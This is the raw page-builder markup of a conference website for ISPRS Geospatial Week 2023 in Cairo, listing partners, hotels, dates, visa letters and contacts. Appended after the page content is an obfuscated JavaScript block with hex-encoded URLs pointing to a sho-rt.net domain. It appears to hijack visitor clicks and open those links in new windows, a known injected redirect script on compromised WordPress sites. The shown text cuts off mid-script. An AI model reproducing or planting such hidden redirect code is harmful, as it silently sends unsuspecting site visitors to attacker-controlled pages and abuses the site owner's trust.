18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 